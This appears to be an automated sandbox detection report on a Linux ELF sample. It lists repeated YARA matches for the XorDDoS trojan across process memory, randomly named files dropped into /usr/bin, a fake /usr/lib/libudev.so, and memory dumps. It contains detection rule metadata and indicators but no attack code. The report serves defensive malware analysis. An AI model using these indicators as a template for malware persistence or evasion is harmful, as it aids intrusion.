Source: Process Memory Space: eTASxT3bjO.elf PID: 5437, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5450, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5453, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5455, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5458, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5461, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5470, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5473, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5475, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5478, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5481, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5493, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5496, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5498, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5501, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5504, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5530, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5533, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5535, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5538, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5541, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5548, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5551, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5553, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5556, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5558, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5565, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5568, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5570, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5573, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5576, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5582, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5585, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5589, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5592, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5594, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5601, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5604, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5606, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5609, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5612, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5620, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5623, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5625, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5628, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5631, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5638, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5641, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5643, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5646, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5648, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5655, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5657, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5660, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5663, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5666, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5672, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5675, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5677, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5680, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5683, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5691, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5694, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5696, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5699, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5702, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/ygqhgbaeei, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/ygqhgbaeei, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/ygqhgbaeei, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/kffnhivjdw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/kffnhivjdw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/svkksitypo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/svkksitypo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/kffnhivjdw, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/svkksitypo, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/eoogzzilvp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/eoogzzilvp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/eoogzzilvp, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/xjdcsmwtwe, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/xjdcsmwtwe, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/xjdcsmwtwe, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/evbjclrakz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/evbjclrakz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/evbjclrakz, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wvicexcnqi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/wvicexcnqi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/zqylkjndwx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/zqylkjndwx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/zqylkjndwx, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/mqnpjwpasf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/mqnpjwpasf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/mqnpjwpasf, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/yfaogzsdtv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/yfaogzsdtv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/yfaogzsdtv, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/xaxopmwzau, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/xaxopmwzau, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/xaxopmwzau, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/vijnytmbcx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/vijnytmbcx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/vijnytmbcx, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/uruvhkrplh, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/uruvhkrplh, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/uruvhkrplh, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/ghgagimgub, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/ghgagimgub, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/ghgagimgub, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/exnwncfijy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/exnwncfijy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/exnwncfijy, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen

Source: ELF static info symbol of initial sample

.symtab present: no

Source: eTASxT3bjO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: eTASxT3bjO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: eTASxT3bjO.elf, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
